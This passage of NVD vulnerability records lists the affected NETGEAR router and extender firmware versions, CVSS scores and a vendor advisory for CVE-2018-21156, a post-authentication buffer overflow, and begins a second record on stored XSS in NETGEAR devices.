"matchCriteriaId": "97DE1C91-59A0-4902-B5C7-0CFD2631CAEE",
"versionEndExcluding": "1.0.1.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B0BCDB34-EC1F-43A1-AA7D-BF4CA1F4C168",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A71BAC6A-F08E-4015-9A54-3CF5FDF85950",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07AC82A1-7C63-4CC1-BF7E-695084B2F325",
"versionEndExcluding": "1.3.0.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "577AD463-2E99-4D07-BF12-1D40AC88B3FC",
"versionEndExcluding": "1.0.9.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2A5F74BE-5D7A-4CCF-B7A7-F5AAE4DD5DAE",
"versionEndExcluding": "1.3.0.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7E4D2E75-1ADA-4ECE-B1B5-12E28913063E",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16C3369B-3E65-4CB7-BFF0-5052DBB16C45",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6DFB128D-2F6F-439B-AFE0-FAAE762F008D",
"versionEndExcluding": "1.0.1.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB542F95-5AE2-47E4-BD7B-34134B26AA4F",
"versionEndExcluding": "1.2.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.38, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGN2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.20, R6300v2 before 1.0.4.22, R6400 before 1.0.1.32, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R6900P before 1.3.0.18, R7000 before 1.0.9.28, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.52, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.46."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer por parte de un usuario autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.38, D6400 versiones anteriores a 1.0.0.74, D7000v2 versiones anteriores a 1.0.0.74, D8500 versiones anteriores a 1.0.3.39, DGN2200v4 versiones anteriores a 1.0.0.102, DGN2200Bv4 versiones anteriores a 1.0.0.102, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1.0.0.30, EX6100 versiones anteriores a 1.0.2.22, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150 versiones anteriores a 1.0.0.38, EX6200 versiones anteriores a 1.0.3.86, EX7000 versiones anteriores a 1.0.0.64, R6250 versiones anteriores a 1.0.4.20, R6300v2 versiones anteriores a 1.0.4.22, R6400 versiones anteriores a 1.0.1.32, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.44, R6900 versiones anteriores a 1.0.1.44, R6900P versiones anteriores a 1.3.0.18, R7000 versiones anteriores a 1.0.9.28, R7000P versiones anteriores a 1.3.0.18, R7300DST versiones anteriores a 1.0. 0.62, R7900 versiones anteriores a 1.0.2.10, R7900P versiones anteriores a 1.3.0.10, R8000 versiones anteriores a 1.0.4.12, R8000P versiones anteriores a 1.3.0.10, R8300 versiones anteriores a 1.0.2.116, R8500 versiones anteriores a 1.0.2.116, WN2500RPv2 versiones anteriores a 1.0.1.52, WNDR3400v3 versiones anteriores a 1.0.1.18, y WNR3500Lv2 versiones anteriores a 1.2.0.46."
}
],
"id": "CVE-2018-21156",
"lastModified": "2024-11-21T04:03:02.340",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-27T18:15:12.420",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000059474/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Gateways-Routers-and-Extenders-PSV-2017-2460"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000059474/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Gateways-Routers-and-Extenders-PSV-2017-2460"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-08-11 00:17
Modified
2024-11-21 06:17
Severity ?
4.1 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L
4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Summary
Certain NETGEAR devices are affected by stored XSS. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6100 before 1.0.0.60, D6200 before 1.1.00.36, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, DM200 before 1.0.0.61, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.62, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7450 before 1.2.0.36, R7900 before 1.0.3.8, R7900P before 1.4.1.50, R8000 before 1.0.4.28, R8000P before 1.4.1.50, R8300 before 1.0.2.130, R8500 before 1.0.2.130, WNDR3400v3 before 1.0.1.24, WNR2020 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, XR450 before 2.3.2.40, and XR500 before 2.3.2.40.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BECFDEE-A795-43F1-9651-13096141B3BE",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C6F2403-48F3-436E-B625-326E7B58EFC8",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FA3E7329-F839-4DD3-921F-B9E8DEDC8F12",
"versionEndExcluding": "1.0.0.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C487C01-3E4A-4DBB-9BFB-A143E6B90580",
"versionEndExcluding": "1.1.00.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B185396-F010-45EF-B533-0AD61C095273",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58E68C65-9685-40E8-8D51-6C922232168B",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD73CBDF-0B17-4B1A-8A06-9F3926D1D113",
"versionEndExcluding": "1.0.1.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "71A9577C-914A-4B23-BEF7-03DFBD634F5A",
"versionEndExcluding": "1.0.0.53",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C329B7CB-1281-480D-BDDB-E222044D715E",
"versionEndExcluding": "1.0.3.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dc112a_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FDF9C0E1-7128-4052-B05E-3DD3394208A0",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dc112a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F87FFC46-137D-45B8-B437-F15565FB33D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91EFE482-AAF5-4B46-9658-94B1072F3CD2",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "025234D6-A814-4669-9814-3631B54B753D",
"versionEndExcluding": "1.0.0.109",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dm200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6B27650A-B7FE-41E4-8231-9283CC7B8349",
"versionEndExcluding": "1.0.0.61",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dm200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1B048F71-70F1-4D9F-84E2-9F7340F6ADAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC9C60BB-2E7F-4D35-9348-8D8AEFAAD75F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50E2E26A-200E-4D00-9657-034EACE3944F",
"versionEndExcluding": "1.0.0.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DAD3FA3E-6629-4C40-B8DB-8CDF824A9E0D",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DDA7ABF-4C4B-4945-993A-F93BD8FCB55E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EDB0CD0A-A68D-4EF5-A938-6A15604C9107",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6080_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1CCD6658-5418-4FF3-B471-A482A9499487",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6080:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1CEB5C49-53CF-44AE-9A7D-E7E6201BFE62",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "220EBC67-69DA-43D6-8B09-EBEEEF29679D",
"versionEndExcluding": "1.1.0.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6230_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9466A450-0351-4B2D-B816-6A1B6F4F34B9",
"versionEndExcluding": "1.1.0.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6230:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C91CADFA-59DB-4B6C-A914-848884F4A4BD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1DD1F7D-7556-4B95-A33F-E389948D20AA",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
